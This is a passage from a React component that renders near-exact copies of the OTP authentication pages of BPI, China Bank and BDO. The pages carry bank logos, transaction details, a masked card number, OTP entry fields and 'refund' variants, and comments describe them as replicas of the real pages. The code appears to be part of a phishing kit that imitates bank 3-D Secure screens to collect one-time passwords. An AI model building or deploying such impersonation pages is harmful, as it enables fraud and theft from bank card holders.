              <div>{isRefund ? 'Refund Amount' : 'Amount'}: {currency} {amount}</div>
              <div>Date: {formattedDate}</div>
              <div>Card Number: ************{last4}</div>
            </div>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ maxWidth: '20rem', margin: '0.75rem auto 0' }}>
              <label style={{ display: 'block', textAlign: 'center', fontSize: '0.875rem', color: '#787692' }}>
                Please enter 6-digit OTP
              </label>

              <input
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="off"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  marginTop: '0.25rem',
                  height: '3rem',
                  width: '100%',
                  borderRadius: '0.25rem',
                  border: '1px solid #787692',
                  backgroundColor: '#ffffff',
                  padding: '0 0.75rem',
                  textAlign: 'center',
                  fontSize: '0.875rem',
                  letterSpacing: '0.1em',
                  color: '#000000',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  marginTop: '0.25rem',
                  display: 'flex',
                  height: '2.5rem',
                  width: '100%',
                  alignItems: 'center',
                  justifyContent: 'center',
                  borderRadius: '0.25rem',
                  backgroundColor: '#183AB0',
                  fontSize: '0.875rem',
                  fontWeight: 500,
                  color: '#ffffff',
                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'AUTHENTICATE')}
              </button>
            </form>

            <div style={{ marginTop: '1rem', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#1C3DB1', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                RESEND OTP
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}
          </main>
        </div>
      </div>
    );
  }

  // ─── 8. BPI VARIANT (Exact replica of bpi.html) ────────────────
  if (bank.type === 'bpi') {
    return (
      <div className="ph-container">
        <div className="ph-modal" style={{ width: '100%', maxWidth: '553px', borderRadius: '4px', backgroundColor: '#ffffff', boxShadow: '0 10px 30px rgba(0,0,0,0.15)' }}>
          <div style={{ display: 'flex', justifyContent: 'flex-end', alignItems: 'center', padding: '6px 13px 0', height: '22px' }}>
            <button
              type="button"
              onClick={onCancel || (() => window.location.href = '/')}
              aria-label="Close"
              style={{ background: 'none', border: 'none', color: '#111111', fontSize: '14px', fontWeight: 'bold', cursor: 'pointer' }}
            >
              ✕
            </button>
          </div>

          <div style={{ display: 'flex', justifyContent: 'space-between', alignItems: 'center', padding: '4px 16px 13px', width: '100%', boxSizing: 'border-box' }}>
            <img src={bank.logo} alt="BPI" style={{ height: '36px', width: 'auto', objectFit: 'contain' }} />
            <img src={schemeLogo} alt={schemeAlt} style={{ height: '34px', width: 'auto', objectFit: 'contain' }} />
          </div>

          <div style={{ width: '100%', height: '1px', backgroundColor: '#c5c5c5' }} />

          <main style={{ padding: '16px 20px 24px', boxSizing: 'border-box' }}>
            <h1 style={{ fontSize: '14px', fontWeight: 'bold', color: '#000000', marginBottom: '12px', letterSpacing: '-0.1px' }}>
              {isRefund ? 'Refund Authentication' : 'Payment Authentication'}
            </h1>

            <p style={{ fontSize: '13px', lineHeight: '1.45', color: '#111111', marginBottom: '12px' }}>
              We have sent the One-Time PIN (OTP) via SMS to your registered mobile number. For your protection, NEVER SHARE YOUR ONE-TIME PIN.
            </p>

            <p style={{ fontSize: '13px', lineHeight: '1.45', color: '#111111', marginBottom: '18px' }}>
              You are {isRefund ? 'receiving a refund from' : 'paying'} {merchant} the amount of {currency} {amount} on {formattedDate} from card number ************{last4}.
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ width: '320px', maxWidth: '100%', margin: '0 auto', display: 'flex', flexDirection: 'column', alignItems: 'center' }}>
              <label htmlFor="bpi-otp" style={{ fontSize: '13px', color: '#787692', marginBottom: '4px', textAlign: 'center' }}>
                Verification Code
              </label>
              <input
                id="bpi-otp"
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="one-time-code"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  width: '100%',
                  height: '38px',
                  backgroundColor: '#ffffff',
                  border: '1px solid #8e8e9c',
                  borderRadius: '3px',
                  padding: '0 12px',
                  fontSize: '15px',
                  color: '#000000',
                  textAlign: 'center',
                  letterSpacing: '3px',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  width: '100%',
                  height: '34px',
                  marginTop: '6px',
                  backgroundColor: '#183ab0',
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '3px',
                  fontSize: '13px',
                  fontWeight: 600,
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'CONTINUE')}
              </button>
            </form>

            <div style={{ marginTop: '22px', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{
                  background: 'none',
                  border: 'none',
                  color: '#1c3db1',
                  fontSize: '10px',
                  fontWeight: 'bold',
                  letterSpacing: '0.2px',
                  textTransform: 'uppercase',
                  cursor: 'pointer'
                }}
              >
                CLICK HERE TO RECEIVE ANOTHER OTP
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}

            <div style={{ display: 'flex', justifyContent: 'center', alignItems: 'center', gap: '8px', marginTop: '24px', fontSize: '11px', color: '#1c3db1' }}>
              <span style={{ cursor: 'pointer' }}>FAQ</span>
              <span style={{ color: '#c5c5c5' }}>|</span>
              <span style={{ cursor: 'pointer' }} onClick={() => alert('For assistance, please contact BPI 24/7 Banking at +632 889-10000.')}>Need some help?</span>
            </div>
          </main>
        </div>
      </div>
    );
  }

  // ─── 9. CHINA BANK VARIANT (Exact replica of chinabank.html) ───
  if (bank.type === 'chinabank') {
    return (
      <div className="ph-container">
        <div className="ph-modal" style={{ width: '100%', maxWidth: '520px', borderRadius: '4px', overflow: 'hidden', backgroundColor: '#ffffff', boxShadow: '0 10px 30px rgba(0,0,0,0.15)' }}>
          {/* Top Header with China Bank Logo & Scheme Logo */}
          <div style={{ width: '100%', height: '60px', backgroundColor: '#ffffff', display: 'flex', justifyContent: 'space-between', alignItems: 'center', padding: '0 18px', boxSizing: 'border-box' }}>
            <img src={bank.logo} alt="CHINABANK Since 1920" style={{ height: '36px', width: 'auto', objectFit: 'contain' }} />
            <img src={schemeLogo} alt={schemeAlt} style={{ height: '32px', width: 'auto', objectFit: 'contain' }} />
          </div>

          {/* Top Teal Divider Banner with Red Bottom Border */}
          <div style={{ width: '100%', height: '38px', backgroundColor: '#008991', borderBottom: '4px solid #db1805' }} />

          {/* Main Transaction & OTP Section */}
          <main style={{ padding: '14px 18px 16px', textAlign: 'center', boxSizing: 'border-box' }}>
            <h1 style={{ fontSize: '15px', fontWeight: 'bold', color: '#333333', marginBottom: '8px' }}>
              {isRefund ? 'Refund Details' : 'Transaction details'}
            </h1>

            <div style={{ display: 'flex', flexDirection: 'column', gap: '3px', marginBottom: '12px', fontSize: '12px', color: '#333333', textAlign: 'left' }}>
              <div style={{ display: 'grid', gridTemplateColumns: '130px 1fr' }}>
                <span style={{ color: '#555555' }}>Merchant :</span>
                <span style={{ fontWeight: 500 }}>{merchant}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '130px 1fr' }}>
                <span style={{ color: '#555555' }}>{isRefund ? 'Refund Amount :' : 'Amount :'}</span>
                <span style={{ fontWeight: 500 }}>{currency} {amount}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '130px 1fr' }}>
                <span style={{ color: '#555555' }}>Date :</span>
                <span style={{ fontWeight: 500 }}>{formattedDate}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '130px 1fr' }}>
                <span style={{ color: '#555555' }}>Card number :</span>
                <span style={{ fontWeight: 500 }}>xxxxxxxxxxxx{last4}</span>
              </div>
              <div style={{ display: 'grid', gridTemplateColumns: '130px 1fr' }}>
                <span style={{ color: '#555555' }}>Mobile number :</span>
                <span style={{ fontWeight: 500 }}>registered mobile</span>
              </div>
            </div>

            <p style={{ fontSize: '12px', color: '#333333', lineHeight: '1.4', margin: '0 0 12px' }}>
              {isRefund
                ? 'Please enter the One Time Password (OTP) we sent to your registered mobile number to confirm your refund:'
                : 'Please enter the One Time Password (OTP) we sent to your registered mobile number to confirm the transaction below:'}
            </p>

            {renderError()}

            <form onSubmit={handleSubmit} style={{ display: 'flex', justifyContent: 'center', alignItems: 'center', gap: '8px', margin: '0 0 12px' }}>
              <input
                id="chinabank-otp"
                type="text"
                inputMode="numeric"
                pattern="[0-9]*"
                maxLength={8}
                autoComplete="one-time-code"
                value={code}
                onChange={handleCodeChange}
                autoFocus
                style={{
                  height: '34px',
                  width: '140px',
                  border: '1px solid #999999',
                  borderRadius: '2px',
                  padding: '0 8px',
                  fontSize: '14px',
                  textAlign: 'center',
                  letterSpacing: '2px',
                  outline: 'none',
                  boxSizing: 'border-box'
                }}
              />

              <button
                type="submit"
                disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
                style={{
                  height: '34px',
                  padding: '0 18px',
                  backgroundColor: code.length >= 6 ? '#db1805' : '#008991',
                  color: '#ffffff',
                  border: 'none',
                  borderRadius: '2px',
                  fontSize: '13px',
                  fontWeight: 600,
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'Confirm Refund' : 'Submit')}
              </button>
            </form>

            <div style={{ display: 'flex', justifyContent: 'center', alignItems: 'center', gap: '6px', margin: '0 0 10px' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{
                  background: 'none',
                  border: 'none',
                  color: '#008991',
                  fontSize: '12px',
                  fontWeight: 600,
                  cursor: 'pointer',
                  display: 'flex',
                  alignItems: 'center',
                  gap: '4px'
                }}
              >
                <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
                  <path d="M23 4v6h-6"/>
                  <path d="M1 20v-6h6"/>
                  <path d="M3.51 9a9 9 0 0 1 14.85-3.36L23 10M1 14l4.64 4.36A9 9 0 0 0 20.49 15"/>
                </svg>
                Resend Code
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}

            <p style={{ fontSize: '11px', color: '#666666', margin: '8px 0 0', lineHeight: '1.3' }}>
              In case you did not receive your OTP, please call China Bank Customer Service 24/7 Hotline at +632 888-55-888.
            </p>
          </main>

          {/* Bottom Teal Bar with Action Pills */}
          <footer style={{ backgroundColor: '#008991', padding: '8px 14px', display: 'flex', justifyContent: 'space-between', alignItems: 'center', boxSizing: 'border-box' }}>
            <button
              type="button"
              onClick={onCancel || (() => window.location.href = '/')}
              style={{
                background: '#ffffff',
                border: 'none',
                borderRadius: '14px',
                padding: '4px 12px',
                fontSize: '11px',
                color: '#333333',
                cursor: 'pointer',
                display: 'flex',
                alignItems: 'center',
                gap: '4px',
                fontWeight: 500
              }}
            >
              ✕ <span>Cancel my purchase</span>
            </button>

            <button
              type="button"
              onClick={() => alert('For assistance, please call China Bank Customer Service 24/7 Hotline at +632 888-55-888.')}
              style={{
                background: '#ffffff',
                border: 'none',
                borderRadius: '14px',
                padding: '4px 12px',
                fontSize: '11px',
                color: '#333333',
                cursor: 'pointer',
                display: 'flex',
                alignItems: 'center',
                gap: '4px',
                fontWeight: 500
              }}
            >
              ℹ <span>Help Page</span>
            </button>
          </footer>
        </div>
      </div>
    );
  }

  // ─── 7. BDO VARIANT (Exact 1:1 replica of BDO.jsx - default) ────
  return (
    <div className="ph-container">
      <div className="ph-modal">
        <main className="ph-body">
          <div className="ph-logos-header">
            <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
          </div>

          <h1 style={{ marginTop: '1.75rem', fontSize: '1rem', fontWeight: 'bold', color: '#434C74' }}>
            {isRefund ? 'Verify refund transaction via OTP:' : 'Verify this transaction via OTP:'}
          </h1>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.5rem', color: '#404040' }}>
            An OTP was sent to your mobile no.
          </p>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.5rem', color: '#404040' }}>
            You are {isRefund ? 'receiving a refund of' : 'paying'} {currency} {amount} {isRefund ? 'from' : 'to'} {merchant} using XXXX XXXX XXXX {last4} with Ref no b7e5f6aa.
          </p>

          {renderError()}

          <form onSubmit={handleSubmit} style={{ marginTop: '1.75rem' }}>
            <label htmlFor="bdo-otp" style={{ display: 'block', fontSize: '0.875rem', fontWeight: 'bold', color: '#000000' }}>
              Enter OTP
            </label>

            <input
              id="bdo-otp"
              type="text"
              inputMode="numeric"
              pattern="[0-9]*"
              maxLength={8}
              autoComplete="off"
              value={code}
              onChange={handleCodeChange}
              autoFocus
              style={{
                marginTop: '0.75rem',
                height: '2.5rem',
                width: '100%',
                borderRadius: '0.375rem',
                border: '1px solid #d4d4d4',
                backgroundColor: '#ffffff',
                padding: '0 0.75rem',
                fontSize: '0.75rem',
                color: '#404040',
                outline: 'none',
                boxSizing: 'border-box'
              }}
            />

            <button
              type="submit"
              disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
              style={{
                marginTop: '0.75rem',
                display: 'flex',
                height: '2.5rem',
                width: '100%',
                alignItems: 'center',
                justifyContent: 'center',
                borderRadius: '0.375rem',
                backgroundColor: '#0891b2',
                fontSize: '0.75rem',
                fontWeight: 500,
                color: '#ffffff',
                border: 'none',
                cursor: 'pointer'
              }}
            >
              {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'SUBMIT')}
            </button>

            <button
              type="button"
              onClick={handleResend}
              style={{
                marginTop: '0.75rem',
                display: 'flex',
                height: '2.5rem',
                width: '100%',
                alignItems: 'center',
                justifyContent: 'center',
                borderRadius: '0.375rem',
                backgroundColor: '#737373',
                fontSize: '0.75rem',
                fontWeight: 500,
                color: '#ffffff',
                border: 'none',
                cursor: 'pointer'
              }}
            >
              RESEND
            </button>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}
          </form>
        </main>
      </div>
    </div>
  );
}
